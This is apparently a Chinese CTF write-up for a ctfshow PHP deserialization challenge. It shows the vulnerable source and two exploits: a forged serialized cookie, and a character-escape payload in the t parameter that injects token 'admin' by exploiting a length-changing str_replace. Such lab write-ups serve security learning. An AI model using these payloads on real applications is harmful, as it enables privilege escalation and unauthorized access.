PHP/5.6.40字符逃逸
index.php
<?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2020-12-03 02:37:19# @Last Modified by: h1xa# @Last Modified time: 2020-12-03 16:05:38# @message.php# @email: h1xa@ctfer.com# @link: https://ctfer.com*/error_reporting(0);class message{public $from;public $msg;public $to;public $token='user';public function __construct($f,$m,$t){$this->from = $f;$this->msg = $m;$this->to = $t;}}$f = $_GET['f'];$m = $_GET['m'];$t = $_GET['t'];if(isset($f) && isset($m) && isset($t)){$msg = new message($f,$m,$t);$umsg = str_replace('fuck', 'loveU', serialize($msg));setcookie('msg',base64_encode($umsg));echo 'Your message has been sent';}highlight_file(__FILE__);
看注释发现 message.php
<?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2020-12-03 15:13:03# @Last Modified by: h1xa# @Last Modified time: 2020-12-03 15:17:17# @email: h1xa@ctfer.com# @link: https://ctfer.com*/highlight_file(__FILE__);include('flag.php');class message{public $from;public $msg;public $to;public $token='user';public function __construct($f,$m,$t){$this->from = $f;$this->msg = $m;$this->to = $t;}}if(isset($_COOKIE['msg'])){$msg = unserialize(base64_decode($_COOKIE['msg']));if($msg->token=='admin'){echo $flag;}}
第一种做法
poc
<?phpclass message{public $token='admin';}$msg = new message();echo(base64_encode(serialize($msg)));?>
flag
ctfshow{fb549105-65ee-4b60-99bb-7cc6ed9dd9d9}
第二种做法
因有一个正则替换,注意是序列化后再替换,且替换每次内容长度增加1,假如输入 t=fuck"
我们输入的 " 刚刚好可以发前面闭合,也就是说,我们每输入一个 fuck,我们可控的内容就多出 1 个字符。
我们目的构造 $token="admin" 序列化长这样 
即 s:5:"token";s:5:"admin";
加上闭合";``s:5:"token";s:5:"admin";``}
长度为 27
也就是我们需要输入 27 个 fuck
poc
/?f=6&m=6&t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}
flag
ctfshow{8800cd7c-cd8a-4cf3-9a6f-71965ce5a4a3}
若有收获,就点个赞吧
0 人点赞
